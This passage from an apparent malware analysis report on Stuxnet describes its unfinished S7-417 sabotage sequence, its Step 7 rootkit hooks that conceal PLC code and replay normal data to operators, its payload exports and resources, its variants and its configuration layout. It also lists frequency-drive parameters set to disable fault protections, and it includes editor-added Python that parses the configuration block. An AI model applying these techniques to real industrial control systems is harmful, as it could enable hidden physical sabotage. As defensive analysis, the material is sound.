• After approximately 27 days, enough events have been recorded.
• The infected PLC generates and sends sequence 1 to its frequency converter drives, setting the frequency to 1410Hz.
• Normal operation resumes.
• After approximately 27 days, enough events have been recorded.
• The infected PLC generates and sends sequence 2 to its frequency converter drives, setting the frequency initially to 2Hz and then 1064Hz.
• …

Sequence C
Stuxnet has a second sabotage strategy targeting S7-417 PLCs. However, the routine is incomplete and the PLC
code, referred to as sequence C, is never purposefully copied onto a PLC or executed. While we can speculate the
PLC code injection was active at a previous time, sequence C itself appears unfinished, contains unimplemented
cases, unused code blocks, and test or debug code. This sequence is more complex than sequences A or B. It
contains more blocks of code and data (32), and also generates data blocks on-the-fly using specific SFC blocks.
The figure below represents sequence C.
Figure 28

Connections Between Blocks, Sequence C

Sequence C Injection
Stuxnet hooks the Step 7 write function, so that whenever someone updates code on the PLC, sequence C is copied to the PLC. However, because code for a single function in the DLL is missing, sequence C is never properly activated.


The S7-417 PLC code-installation routine starts when an operator of the target system performs a write operation to a S7-417 PLC, such as updating code. The SDB7 is read and DB8061 (consisting of Stuxnet-specific data) is created based on the values in SDB7. However, due to the incomplete function in the DLL, DB8061 is never created and the data contained in DB8061 is unknown. In particular, the reference to the function exists, but when called, a Windows exception occurs. The exception is caught and execution resumes as if DB8061 was created.

Figure 29

Code where an exception is thrown

.text:1000D947 68 70 C8 03 10    push    offset unk_1003C870
.text:1000D94C 8D 45 FF          lea     eax, [ebp+var_1]
.text:1000D94F 50                push    eax
.text:1000D950 E8 93 47 00 00    call    __CxxThrowException@8
.text:1000D950

The blocks that compose sequence C are then written to the PLC, including the modifications of SDB0 and SDB4, and OB80 is created as well, if it did not previously exist. OB80 is the time-event error interrupt and is called if the maximum cycle time is exceeded. SDB0 is expected to contain records holding CPU configuration information. The block is parsed and a static 10-byte long record is inserted into the block. The purpose of this insertion is unknown. However, contrary to what happens with sequences A and B, no specific values are searched in the block. Moreover, record 13 of SDB0 can be modified.

The creation timestamp of SDB0 is incremented, and this timestamp is replicated to a specific location in SDB4
for consistency. Sequence C is written and Stuxnet also makes sure an OB80 exists, or else creates an empty
one.

Later, the modification of OB1 (the entry point) that is needed to execute sequence C never occurs. The code to modify OB1 requires the successful completion of the missing function and since the function throws an exception, OB1 is not modified and the remaining sequence C code blocks are never executed.

Even if OB1 is modified to execute sequence C, the missing (or an existing unrelated) DB8061 would cause sequence C to operate improperly. Finally, even if OB1 was modified and DB8061 contained correct values, unimplemented cases in sequence C would likely cause it to operate unexpectedly. Thus, sequence C appears unfinished.

Stuxnet also hooks Step 7 to monitor for writes specifically to SDB7. When SDB7 is written, Stuxnet will modify three bytes in DB8061. Thus, if DB8061 already exists coincidentally on the target PLC, three values will accidentally be modified, potentially corrupting the PLC operation.

The following provides a step-by-step summary of the failed injection process:
1. Read SDB7
2. Attempt to generate DB8061, which fails
3. Modify SDB0, SDB4
4. Copy sequence C blocks to the PLC (do not overwrite existing blocks)
5. Create OB80 if it does not exist
6. Modify OB1 (does not occur)

Figure 30

Eight states in sequence C

Sequence C Behavior
The following describes the behavior of sequence C. However, these behaviors never happen due to the missing function in the DLL. Sequence C consists of 40 blocks, 26 containing Stuxnet code, 4 with standard code blocks, and 10 containing data.

Sequence C consists of a state machine with eight states.

DB8061 is critical to the operation of sequence C and because DB8061 is missing, the exact behavior of sequence C is unknown.


State 0: Wait
The code expects six groups of 164 peripherals. Based on knowledge from the S7-315 code, these could be six
cascades containing 164 centrifuges each. Stuxnet monitors the groups, and the sum of the activity times for all
groups must be greater than 297 days or for a single group greater than 35 days. In addition, all groups must be
active for at least three days.
State 1: Recording
DB8064 through DB8070 (seven blocks) are created and each contains three sub-blocks for a total of 21 sub-
blocks. The input area of an I/O image is copied into each sub-block with a one second interval between copies,
forming a 21 second recording of the input area. The input area contains information being passed to the PLC
from a peripheral. (For example, the current state of a valve or the temperature of a device.)
State 2 - 6: Sabotage
When the peripheral output is written to, sequence C intercepts the output and ensures it is not written to the
process image output. The output is the instructions the PLC sends to a device to change its operating behavior.
By intercepting the peripheral output, Stuxnet prevents an operator from noticing unauthorized commands sent
to the peripheral.
Each cascade of 164 peripherals is grouped into 15 clusters (0 – 14). Each cluster is affected, but not every centrifuge within a cluster is affected. The following table shows for each group how many peripherals within each cluster are affected.
Table 7

Affected peripherals within each cluster

Cluster  Peripherals in  Peripheral  Peripherals
number   the cluster     numbers     affected
0        2               0-1         2
1        2               2-3         2
2        4               4-7         2
3        6               8-13        4
4        8               14-21       6
5        10              22-31       8
6        12              32-43       10
7        16              44-59       13
8        20              60-79       14
9        24              80-103      0
10       20              104-123     14
11       16              124-139     13
12       12              140-151     10
13       8               152-159     8
14       4               160-163     4

The particular peripherals within the clusters that are affected are pseudo-randomly chosen. For example, cluster 4 contains 8 peripherals (peripheral 14 to 21). According to the table, 6 out of 8 are affected. One peripheral within the cluster is pseudo-randomly selected. Let’s say peripheral 20 is selected. Stuxnet will then sabotage peripherals 20, 21, 14, 15, 16, and 17. If an error occurs when attempting to sabotage one of the peripherals, the next one is selected. For example, if an error occurs when affecting peripheral 15, then peripherals 16, 17, and now 18 would be targeted.

A total of 110 peripherals will be affected out of 164.
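Table 7 and the cluster-4 walk-through above can be checked against a small model: the per-cluster counts must sum to 164 and 110, and the selection wraps around inside a cluster and steps past peripherals that report an error. The Python below is an added example written for this page (not Symantec's or Stuxnet's code) that encodes the table and that walk; the starting peripheral is passed in as a parameter because the dossier does not describe the pseudo-random choice.

```python
from typing import FrozenSet, List, Tuple

# Table 7 as (first peripheral number, peripherals in cluster, peripherals affected).
CLUSTERS: List[Tuple[int, int, int]] = [
    (0, 2, 2), (2, 2, 2), (4, 4, 2), (8, 6, 4), (14, 8, 6),
    (22, 10, 8), (32, 12, 10), (44, 16, 13), (60, 20, 14), (80, 24, 0),
    (104, 20, 14), (124, 16, 13), (140, 12, 10), (152, 8, 8), (160, 4, 4),
]


def total_peripherals() -> int:
    return sum(size for _, size, _ in CLUSTERS)


def total_affected() -> int:
    return sum(affected for _, _, affected in CLUSTERS)


def cluster_of(peripheral: int) -> int:
    """Map a peripheral number (0-163) to its cluster index."""
    for idx, (first, size, _) in enumerate(CLUSTERS):
        if first <= peripheral < first + size:
            return idx
    raise ValueError(f"peripheral {peripheral} is outside 0-{total_peripherals() - 1}")


def select_in_cluster(cluster: int, start: int,
                      failed: FrozenSet[int] = frozenset()) -> List[int]:
    """Walk the cluster circularly from `start`, collecting as many
    peripherals as Table 7 assigns to it and skipping any in `failed`.

    `start` stands in for the pseudo-random pick the dossier mentions; the
    real selection algorithm is not documented, so it is a parameter here.
    """
    first, size, wanted = CLUSTERS[cluster]
    if not first <= start < first + size:
        raise ValueError("start peripheral is not in this cluster")
    chosen, pos, steps = [], start, 0
    # Stop after one full lap so a cluster with too many failures terminates.
    while len(chosen) < wanted and steps < size:
        if pos not in failed:
            chosen.append(pos)
        pos = first + (pos - first + 1) % size   # wrap within the cluster
        steps += 1
    return chosen


def select_all(starts: List[int],
               failed: FrozenSet[int] = frozenset()) -> List[int]:
    """One start peripheral per cluster; returns every affected peripheral."""
    out: List[int] = []
    for cluster, start in enumerate(starts):
        out.extend(select_in_cluster(cluster, start, failed))
    return out


if __name__ == "__main__":
    print("peripherals:", total_peripherals(), "affected:", total_affected())
    print("cluster 4 from 20:", select_in_cluster(4, 20))
    print("cluster 4 from 20, 15 failing:", select_in_cluster(4, 20, frozenset({15})))
```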

While this behavior occurs across the four states, state 3 takes place in two parts, with a two minute break in
between. The transition from state 5 to state 6 takes place after 2 minutes, 53 seconds.

State 6 is the state where the writing to the image/peripheral output takes place. This state lasts 6 minutes, 58
seconds.

How the peripherals are affected is unknown. Data is written to the image/peripheral output changing their
behavior, but the data to be written is within DB8061, which is missing.

State 7: Reset
The seven dynamically created data blocks (DB8064-DB8070) are deleted and many of the data values in the
data blocks are reset. State 7 can also be reached if any error occurs or if more than seven seconds elapses
between two OB1 cycles.


A return to state 1 will occur, resulting in a cycle consisting of waiting approximately 35 days, followed by a seven
minute attack phase.

Thus, while the clear intention of the S7-417 code is unknown, key bits may support the theory of a secondary
attack strategy on centrifuge systems within a cascade.

The rootkit
The Stuxnet PLC rootkit code is contained entirely in the fake s7otbxdx.dll. In order to achieve the aim of continuing to exist undetected on the PLC it needs to account for at least the following situations:
• Read requests for its own malicious code blocks.
• Read requests for infected blocks (OB1, OB35, DP_RECV).
• Write requests that could overwrite Stuxnet’s own code.
Stuxnet contains code to monitor and intercept these types of requests. The threat modifies these requests so that Stuxnet’s PLC code is not discovered or damaged. The following list gives some examples of how Stuxnet uses the hooked exports to handle these situations:
• s7blk_read
  Used to read a block, is monitored so that Stuxnet returns:
  • The original DP_RECV (kept as FC1869) if DP_RECV is requested.
  • An error if the request regards one of its own malicious blocks.
  • A cleaned (disinfected on the fly) copy of OB1 or OB35 if such a block is requested.
• s7blk_write
  Used to write a block, is also monitored:
  • Requests to OB1/OB35 are modified so that the new version of the block is infected before it’s written.
  • Requests to write DP_RECV are also monitored. The first time such a request is issued, the block will be written to FC1869 instead of DP_RECV. Next time an error will be raised (since these system blocks are usually written only once).
  • Also note that the injection of sequence C takes place through a s7blk_write operation. Exact conditions are not determined.
• s7blk_findfirst and s7blk_findnext
  Used to enumerate blocks of a PLC. Stuxnet will hide its own blocks by skipping them voluntarily during an enumeration. Note that Stuxnet recognizes its own blocks by checking a specific value it sets in a block header.
• s7blk_delete
  Used to delete blocks, is monitored carefully:
  • Requests to delete a SDB may result in PLC disinfection.
  • Requests to delete OB are also monitored. It seems the blocks are not necessarily deleted. They could be infected. For instance, deletion of OB80 (used to handle asynchronous error interrupts) can result in an empty OB80 being written.

Other export hooks


Other exports are hooked to achieve other functions, including PLC information gathering, others remaining quite obscure at the time of writing:
• s7db_open and s7db_close
  Used to obtain information used to create handles to manage a PLC (such a handle is used by APIs that manipulate the PLC).
• s7ag_read_szl
  Used to query PLC information, through a combination of an ID and an index (it can be used for instance to get the PLC type.) The export modifies the API’s return information if it’s called with specific ID=27, index=0.
• s7_event
  The purpose of the original API is unknown. The export can modify block DB8062 of sequence C.
• s7ag_test
• s7ag_link_in
• s7ag_bub_cycl_read_create
• s7ag_bub_read_var
• s7ag_bub_write_var
• s7ag_bub_read_var_seg
• s7ag_bub_write_var_seg
Stuxnet records the previous operating frequencies for the frequency controllers. This data is played back to WinCC through these hooked functions during the sabotage routines. Thus, instead of the monitoring systems receiving the anomalous operating frequency data, the monitoring systems believe the frequency converters are operating as normal.

In addition, OB35 is infected as previously described. When the sabotage routine occurs, OB35 prevents the original OB35 code from executing. Assuming the original OB35 code initiates a graceful shutdown during catastrophic events, even if the operators realize the system is operating abnormally, they will not be able to safely shut down the system.

Interestingly, OB35 uses a magic marker value of 0xDEADF007 (possibly to mean Dead Fool or Dead Foot – a term used when an airplane engine fails) to specify when the routine has reached its final state.


Payload Exports
Export 1
Starts removable drive infection routine as described in the Removable Drive Propagation section. Also starts
the RPC server described in the Peer-to-Peer Communication section.

Export 2
Hooks APIs as described in the Step 7 Project File Infections section.

Export 4
Initialization for export 18, which removes Stuxnet from the system.

Export 5
Checks if MrxCls.sys is installed. The purpose of MrxCls.sys is described in the Load Point section.

Export 6
Export 6 is a function to return the version number of the threat read from the configuration data block. The ver-
sion information is stored in the configuration data block at offset 10h.

Export 7
Export 7 simply jumps to export 6.

Export 9
Executes possibly new versions of Stuxnet from infected Step 7 projects as described in the Step 7 Project File
Infections section.

Export 10
Executes possibly new versions of Stuxnet from infected Step 7 projects as described in the Step 7 Project File
Infections section.

Export 14
Main wrapper function for Step 7 project file infections as described in the Step 7 Project File Infections section.

Export 15
Initial entry point described in the Installation section.

Export 16
Main installation routine described in the Installation section.

Export 17
Replaces a Step 7 DLL to infect PLCs as described in the Sabotaging PLCs section.

Export 18
Removes Stuxnet from the system by deleting the following files:
1. Malicious Step 7 DLL
2. Driver files MrxCls.sys and MrxNet.sys
3. oem7A.PNF
4. mdmeric3.pnf
5. mdmcpq3.pnf (Stuxnet’s configuration file)

Export 19
Removable drive infecting routine as described in the Removable Drive Propagation section.

Export 22
Contains all the network spreading routines described in the Network Spreading Routines section.

Export 24
Checks if the system is connected to the Internet. Performs a DNS query on two benign domains in the configuration data (by default windowsupdate.com and msn.com) and updates the configuration data with the status.

Export 27
Contains part of the code for the RPC server described in the Peer-to-Peer Communication section.

Export 28
Contains command and control server functionality described in the Command and Control section.

Export 29
Contains command and control server functionality described in the Command and Control section.

Export 31
Executes possibly new versions of Stuxnet from infected Step 7 projects as described in the Step 7 Project File
Infections section.

Export 32
The same as export 1, except it does not check for an event signal before calling the removable drive spreading
routines and the RPC server code. This export is described in the Removable Drive Propagation section.

Payload Resources
The exports above need to load other files/templates/data to perform their tasks. All of these files are stored in
the resources section of the main .dll file. The function of each resource is discussed in detail here.

Resource 201
Load point driver MrxCls.sys, signed with a compromised Realtek certificate, as described in the Load Point section (Table 12 below lists resource 201 as Mrxcls.sys; the MrxNet.sys rootkit driver is resource 242).

Resource 202
The DLL used in Step 7 project infections as described in the Step 7 Project File Infections section.

Resource 203
CAB file, contains a DLL very similar to resource 202 that is added to WinCC project directories (as described in Step 7 Project File Infections) and then loaded and executed through SQL statements as described in the Infecting WinCC Machines section.

Resource 205
Encoded configuration file for the load point driver (MrxCls.sys) that is added to the registry. The file specifies
what process should be injected and with what, which is described in the Load Point section.

Resource 207
Stuxnet appended with autorun.inf information. Only in previous variants of Stuxnet.

Resource 208
Step 7 replacement DLL used in infecting PLCs as described in the Sabotaging PLCs section.

Resource 209
25 bytes long data file created in %Windir%\help\winmic.fts

Resource 210
Template PE file used by many exports when creating or injecting executables.

Resource 221
This resource file contains the code to exploit the Microsoft Windows Server Service Vulnerability - MS08-067 as
described in the MS08-067 Windows Server Service vulnerability section.

Resource 222
This resource file contains the code to exploit the Microsoft Windows Print Spooler Vulnerability – MS10-061, as described in the MS10-061 Print Spooler Zero day vulnerability section.

Resource 231
Checks if the system is connected to the Internet. This resource is only in previous variants of Stuxnet.

Resource 240
Used to build unique .lnk files depending on drives inserted as described in the Removable Drive Propagation
section.

Resource 241
The file WTR4141.tmp signed by Realtek and described in the Removable Drive Propagation section.

Resource 242
Mrxnet.sys rootkit file signed by Realtek.

Resource 250
0-day exploit code that results in an escalation of privilege due to the vulnerability in win32k.sys. Details are
described in the Windows Win32k.sys Local Privilege Escalation vulnerability (MS10-073) section.

Variants
Out of 3,280 collected samples, three distinct variants have been identified. They have compile times of:
• Mon Jun 22 16:31:47 2009
• Mon Mar 01 05:52:35 2010
• Wed Apr 14 10:56:22 2010
A fourth variant is likely to exist as a driver file, signed with the JMicron digital certificate that was found, but the
variant dropping this driver has yet to be recovered.

This document primarily concentrates on the March 2010 variant. The April 2010 variant differs only very slightly from the March 2010 variant (for example, it increases the date at which USB spreading stops). However, the June 2009 variant has significant differences from the March and April 2010 samples. The compile times appear accurate based on the infection times seen for each sample. A version number contained within the binary also corresponds to this chronology.
Table 8

Comparison of Resources (sizes in bytes; "-" means the resource is absent from that variant)
Resource ID   March 2010   June 2009
201           26,616       19,840
202           14,848       14,336
203           5,237        -
205           433          323
207           -            520,192
208           298,000      298,000
209           25           25
210           9,728        9,728
221           145,920      145,920
222           102,400      102,400
231           -            10,752
240           4,171        -
241           25,720       -
242           17,400       -
250           40,960       -

As discussed in the Stuxnet Architecture section, Stuxnet segregates its functionality via embedded resources. The newer variants have more resources, but are smaller in size. Table 8 shows the resources of both variants side by side: resources 203, 240, 241, 242 and 250 were added in the latest version, resources 207 and 231 were present only in the older version, and the rest of the resources are constant between old and new samples.

The reason for the difference in size is that Resource ID 207 is absent from the newer versions. Resource 207 is
520kB, so although more resources were added in newer versions of Stuxnet, the sum total of the new resource
sizes is less than 520kB.

The difference in functionality between the June 2009 variant and the March and April 2010 variants is summarized below.

Many of the components are actually identical or are close to identical, having the same functionality with slight
differences in the code.

Table 12

Description of Components
Component   Description                      Change from June 2009 to March 2010
201         Mrxcls.sys rootkit file          Unsigned in June 2009, signed in March 2010
202         Fake Siemens DLL                 Same version info, but recompiled
203         DLL inside a .cab file           New in March 2010
205         Data file
207         Large component                  Moved to 250 (removed)
208         Wrapper for s7otbldx.dll         Almost identical
209         Data file                        Identical
210         Loader .dll that calls payload   Almost identical
221         Network Explorer                 Identical
222         Network Explorer                 Identical
231         Internet Connect .dll            Moved to main module (removed)
240         Link file template               New in March 2010
241         USB loader template              New in March 2010
242         Mrxnet.sys rootkit file          New in March 2010
250         Keyboard hook & injector         New in March 2010
Resources removed in March 2010: 207 and 231. Resources added in March 2010: 203, 240, 241, 242 and 250.

Resources 240, 241, and 242 represent the most significant additions between June 2009 and March 2010.
These resources exploit the Microsoft Windows Shortcut ‘LNK’ Files Automatic File Execution Vulnerability (BID
41732) and implement the Windows rootkit to hide files on USB drives.

The June 2009 variant also contained code that was removed in the March 2010 variant. In particular, the June 2009 variant supported Windows 9x and used autorun.inf to spread on removable drives instead of the LNK exploit.

Resource 207 and 231 were dropped from the newer version of Stuxnet. Resource 231 was used to communicate
with the control servers and has the C&C server names stored in plain text within the file. The newer version
of Stuxnet has moved the Internet connection functionality inside the main payload .dll file and has moved the
URLs from inside resource 231 to the installer component, and the URLs are crudely obfuscated. This gives the
attacker the distinct advantage of updating the configuration of each sample without having to rebuild the entire
package with a new resource inside.

Resource 207 has also been removed, but at least part of its functionality has been retained. Resource 250 contains code that previously resided inside resource 207, although, as the sizes in Table 8 show, resource 250 is much smaller, so some of the functionality of resource 207 has been removed.
Figure 31

Stuxnet Variants
Of the more than 3000 samples recovered, almost all are 2010 variants. A very small percentage of the samples are the 2009 variant. The 2009 variant may have spread more slowly and infected far fewer computers, or the late discovery may have meant infections were either replaced with newer versions or remediated.

Summary
Stuxnet represents the first of many milestones in malicious code history – it is the first to exploit four 0-day vulnerabilities, compromise two digital certificates, and inject code into industrial control systems and hide the code from the operator. Whether Stuxnet will usher in a new generation of malicious code attacks towards real-world infrastructure, overshadowing the vast majority of current attacks affecting more virtual or individual assets, or whether it is a once-in-a-decade occurrence remains to be seen.

Stuxnet is of such great complexity, requiring significant resources to develop, that few attackers will be capable of producing a similar threat; we would not expect masses of threats of similar sophistication to suddenly appear. However, Stuxnet has highlighted that direct attacks on critical infrastructure are possible and not just theory or movie plotlines.

The real-world implications of Stuxnet are beyond any threat we have seen in the past. Despite the exciting challenge in reverse engineering Stuxnet and understanding its purpose, Stuxnet is the type of threat we hope to never see again.

Appendix A
Table 13

Configuration Data
Offset Type Description
+0 Dword Magic
+4 Dword Header size
+8 Dword Validation value
+C Dword Block size
+10 Dword Sequence number
+20 Dword Performance Info
+24 Dword Pointer to Global Config Data
+30 Dword Milliseconds to Wait
+34 Dword Flag
+40 Dword Pointer to Global Config Data
+44 Dword Pointer to Global Config Data
+48 Dword Pointer to Global Config Data
+58 Dword Buffer size
+5c Dword Buffer size
+60 Dword Buffer size
+64 Dword Buffer size
+68 Dword Flag
+6c Dword Flag, if 0, check +70 (if 1, infect USB without timestamp check)
+70 Dword Flag, after checking +6C, if 0, check +78 date
+78 Dword lowdatetime (timestamp before infecting USB)
+7C Dword highdatetime
+80 Dword number of files that must be on the USB key (default 3)
+88 Dword Must be below 80h
+84 Dword Number of Bytes on disk needed - 5Mb
+8c Qword Setup deadline (Jun 24 2012)
+98 Dword Flag
+9c Dword Flag
+A4 Qword Timestamp (start of infection – e.g., 21 days after this time USB infection will stop)
+AC Dword Sleep milliseconds
+b0 Dword Flag
+B4 Qword Timestamp
+c4 Dword Time stamp
+c8 Dword Flag (if 0, infect USB drive, otherwise, uninfect USB drive)
+cc Char[80h] Good domain 1 – windowsupdate.com
+14c Char[80h] Good domain 2 – msn.com
+1cc Char[80h] Command and control server 1
+24c Char[80h] URL for C&C server 1 - index.php
+2cc Char[80h] Command and control server 2
+34c Char[80h] URL for C&C server 2- index.php
+3cc Dword Flag
+3ec Dword Wait time in milliseconds
+3f0 Dword Flag - connectivity check
+3f4 Dword HighDateTime
+3f8 Dword LowDateTime
+3d4 Dword TickCount (hours)
+414 Dword TickCount milliseconds
+418 Char[80h] Step7 project path
+498 Dword pointer to global config
+49c Dword pointer to global config
+4a0 Dword Counter
+59c Dword Flag - 0
+5a0 Dword TickCount Check
+5AC Dword TickCount Check
+5b4 PropagationData block 2
+5f0 PropagationData block 5
+62c PropagationData block 4
+668 PropagationData block 3
+6A4 Dword Flag to control whether WMI jobs should be run
+6A8 Dword Flag to control whether scheduled jobs should be run
+6AC Dword Flag controlling update
+6B4 Dword Flag, disable setup
+6b8 PropagationData block 1

Table 14

Format of a Propagation Data block


Offset Type Description
+00 Qword Timestamp max time
+08 Qword Timestamp AV definitions max timestamp
+10 Qword Timestamp Kernel DLLs max timestamp
+18 Qword Timestamp secondary time
+20 Dword Day count
+24 Dword Flag check secondary time
+28 Dword Flag check time
+2C Dword Flag check AV definitions time
+30 Dword Flag check Kernel DLLs max timestamp
+34 Dword
+38 Dword
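Tables 13 and 14 give enough of the layout to pull a decoded configuration block apart programmatically. The Python below is an added example (the editor's illustration, not Symantec's or Stuxnet's own code): it reads the offsets listed above, decodes the FILETIME fields, and walks the five propagation blocks. Only the offsets, field types and the 0x3C-byte spacing between the propagation blocks come from the tables; the field names, the CONFIG_SIZE constant, the magic value and the constructed sample blob are assumptions. The dword at +10 is named `version` because Export 6 reads the version number from offset 10h, although Table 13 labels it "Sequence number".

```python
# Added example (editor's illustration, not Symantec's or Stuxnet's code): a
# parser for the decoded configuration data block laid out in Tables 13 and 14.
# Only the offsets, field types and the 0x3C-byte spacing of the propagation
# blocks come from the tables; the field names, CONFIG_SIZE, the sample magic
# value and the constructed sample blob are assumptions.
import struct
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
STR_LEN = 0x80                               # Char[80h] fields
PROP_BLOCK_SIZE = 0x3C                       # +5B4, +5F0, +62C, +668 are 0x3C apart
PROP_BLOCK_OFFSETS = {1: 0x6B8, 2: 0x5B4, 3: 0x668, 4: 0x62C, 5: 0x5F0}
CONFIG_SIZE = PROP_BLOCK_OFFSETS[1] + PROP_BLOCK_SIZE   # block 1 is last (assumed)

def filetime_to_datetime(ft):
    """Decode a Windows FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)

def datetime_to_filetime(dt):
    d = dt - EPOCH_1601
    return (d.days * 86_400 * 10**6 + d.seconds * 10**6 + d.microseconds) * 10

def _dword(buf, off):
    return struct.unpack_from("<I", buf, off)[0]

def _qword(buf, off):
    return struct.unpack_from("<Q", buf, off)[0]

def _cstr(buf, off):
    return buf[off:off + STR_LEN].split(b"\x00", 1)[0].decode("ascii", "replace")

def parse_propagation_block(buf, off):
    """Table 14: four FILETIME limits, a day count, and the flag gating each check."""
    return {
        "max_time": filetime_to_datetime(_qword(buf, off)),
        "av_definitions_max": filetime_to_datetime(_qword(buf, off + 0x08)),
        "kernel_dlls_max": filetime_to_datetime(_qword(buf, off + 0x10)),
        "secondary_time": filetime_to_datetime(_qword(buf, off + 0x18)),
        "day_count": _dword(buf, off + 0x20),
        "check_secondary_time": _dword(buf, off + 0x24) != 0,
        "check_time": _dword(buf, off + 0x28) != 0,
        "check_av_definitions": _dword(buf, off + 0x2C) != 0,
        "check_kernel_dlls": _dword(buf, off + 0x30) != 0,
    }

def parse_config(buf):
    """Table 13: the fields an analyst most wants out of a decoded block."""
    if len(buf) < CONFIG_SIZE:
        raise ValueError(f"need {CONFIG_SIZE:#x} bytes, got {len(buf):#x}")
    usb_ts = _dword(buf, 0x78) | (_dword(buf, 0x7C) << 32)   # low/high DWORD pair
    return {
        "magic": _dword(buf, 0x00),
        "version": _dword(buf, 0x10),          # export 6 reads the version at 10h
        "usb_skip_timestamp_check": _dword(buf, 0x6C) == 1,
        "usb_min_timestamp": filetime_to_datetime(usb_ts),
        "usb_min_files": _dword(buf, 0x80),
        "usb_min_free_bytes": _dword(buf, 0x84),
        "setup_deadline": filetime_to_datetime(_qword(buf, 0x8C)),
        "infection_start": filetime_to_datetime(_qword(buf, 0xA4)),
        "usb_action": "infect" if _dword(buf, 0xC8) == 0 else "uninfect",
        "good_domains": [_cstr(buf, 0xCC), _cstr(buf, 0x14C)],
        "c2": [(_cstr(buf, 0x1CC), _cstr(buf, 0x24C)),
               (_cstr(buf, 0x2CC), _cstr(buf, 0x34C))],
        "step7_project_path": _cstr(buf, 0x418),
        "run_wmi_jobs": _dword(buf, 0x6A4) != 0,
        "run_scheduled_jobs": _dword(buf, 0x6A8) != 0,
        "setup_disabled": _dword(buf, 0x6B4) != 0,
        "propagation": {n: parse_propagation_block(buf, off)
                        for n, off in PROP_BLOCK_OFFSETS.items()},
    }

def usb_spreading_window(cfg):
    """Table 13 gives +A4 as the infection start and says USB infection stops
    21 days later; return that (start, end) pair."""
    start = cfg["infection_start"]
    return start, start + timedelta(days=21)

def build_sample_config():
    """Constructed sample blob, not a real Stuxnet configuration: default benign
    domains, placeholder C&C hosts, the Jun 24 2012 setup deadline and the
    documented USB defaults (3 files, 5 MB free)."""
    buf = bytearray(CONFIG_SIZE)
    struct.pack_into("<IIII", buf, 0x00, 0xCAFE0001, 0x20, 0, CONFIG_SIZE)
    struct.pack_into("<I", buf, 0x10, 1)
    struct.pack_into("<II", buf, 0x80, 3, 5 * 1024 * 1024)
    struct.pack_into("<Q", buf, 0x8C,
                     datetime_to_filetime(datetime(2012, 6, 24, tzinfo=timezone.utc)))
    struct.pack_into("<Q", buf, 0xA4,
                     datetime_to_filetime(datetime(2010, 3, 1, tzinfo=timezone.utc)))
    for off, s in ((0xCC, "windowsupdate.com"), (0x14C, "msn.com"),
                   (0x1CC, "c2-one.example"), (0x24C, "index.php"),
                   (0x2CC, "c2-two.example"), (0x34C, "index.php")):
        buf[off:off + len(s)] = s.encode()
    struct.pack_into("<I", buf, 0x6A4, 1)                          # run WMI jobs
    struct.pack_into("<I", buf, PROP_BLOCK_OFFSETS[1] + 0x20, 21)  # day count
    struct.pack_into("<I", buf, PROP_BLOCK_OFFSETS[1] + 0x28, 1)   # check time
    return bytes(buf)
```

Running `parse_config(build_sample_config())` returns the decoded dictionary; on a real sample the input would be the decrypted mdmcpq3.pnf contents rather than the constructed blob. Note that `+88` (must be below 80h) and the out-of-order offsets in the second half of Table 13 are left as the table gives them.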

Appendix B
The oem6c.pnf log file
This file is created as %Windir%\inf\oem6c.pnf.

It is encrypted and used to log information about various actions executed by Stuxnet. This data file appears to have a fixed size of 323,848 bytes; however, the payload is initially empty.

On top of storing paths of recorded or infected Step7 project files, other records of information are stored. Each
record has an ID, a timestamp, and (eventually) data.

Here is a list of records that can be stored to oem6c.pnf:

Communication
• 2DA6h,1—No data. Stored before executing export 28.
• 2DA6h,2—No data. Stored only if export 28 executed successfully.
• 2DA6h,3—Has the initial network packet (to HTTP server) been sent.

S7P/MCP
• 246Eh,1—Unknown. Relates to XUTILS\listen\XR000000.MDX.
• 246Eh,2—Unknown. Relates to GracS\cc_alg.sav.
• 246Eh,3—Filepath S7P.
• 246Eh,4—Filepath S7P.
• 246Eh,4—Filepath MCP.
• 246Eh,5—Filepath MCP.
• 246Eh,6—Recorded Step7 project path.

Network
• F409h, 1—Server names collected from network enumeration.
• F409h, 2—Unknown, index.
• F409h, 3—No data. Related to exploit (failure/success?).

Infection
• 7A2Bh,2—No data. Infection of last removable device success.
• 7A2Bh,5—No data. Infection of last removable device failed.
• 7A2Bh,6—No data. Both files wtr4141/wtr4132 exist on the drive to be infected.
• 7A2Bh,7—No data. Unknown, created on error.
• 7A2Bh,8—No data. Created if not enough space on drive to be infected (less than 5Mb).

Rootkits
• F604h,5—No data. Only if Stuxnet and the rootkits were dropped and installed correctly (installation success).

Appendix C
The following represents the parameters changed on the frequency drives and their values. Descriptions of the values are provided; however, many of these descriptions, especially for parameters over 1000, may be inaccurate (some clearly are inaccurate). These descriptions are derived from multiple sources and, ultimately, custom applications can be used on frequency drives that use and specify their own purpose for these values.
Table 15

Parameters and values for Vacon drive
Parameter Value Possible Description
Frames 1.1
813 2 ?
819 0
1086 1 Disable stop lock - allows parameters adjusting during RUN state (allinone)
114 0 stop button
301 0 DIN3 function
313 0 RO1 function
314 0 RO2 function
315 0 output frequency limit 1 supervision
346 0 output frequency limit 2 supervision
348 0 torque limit supervision function
350 0 reference limit supervision function
354 0 frequency converter temperature limit supervision
356 0 analogue supervision signal
700 0 Response to the 4mA reference fault
701 0 Response to external fault
702 0 Output phase supervision
703 0 Earth fault protection
704 0 Motor thermal protection
709 0 Stall protection
713 0 Underload protection
727 1 Response to undervoltage fault
730 0 Input phase supervision
732 0 Response to thermistor fault
733 0 Response to fieldbus fault
734 0 Response to slot fault
740 0 Response to PT100 fault
1316 0 Brake fault action (allinone)
1082 0 SystemBus communication fault response (allinone)
752 0 Speed error fault function
1353 0 Encoder fault mode (advanced)
303 0 reference scaling min value
304 0 reference scaling maximum value
305 0 reference inversion
434 0 fault
436 0 warning active
438 0 reference fault/warning
439 0 overtemperature warning
441 0 unrequested direction
444 0 external control place
445 0 external brake control
447 0 output frequency limit 1 supervision
448 0 output frequency limit 2 supervision
449 0 Reference limit supervision
450 0 Temperature limit supervision
451 0 Torque limit supervision
452 0 Thermistor fault or warning
463 0 Analogue input supervision limit
485 0 Scaling of motoring torque limit
464 0 Analogue output 1 signal selection
307 0 analogue output function
471 0 Analogue output 2 signal selection
472 0 Analogue output 2 function
478 0 Analogue output 3/ signal selection
479 0 Analogue output 3/ function
312 0 digital output 1 function
486 0 Digital output 1 signal selection
490 0 Digital output 2 function
489 0 Digital output 2 signal selection
307 0 analogue output function
472 0 Analogue output 2 function
479 0 Analogue output 3/ function
464 0 Analogue output 1 signal selection
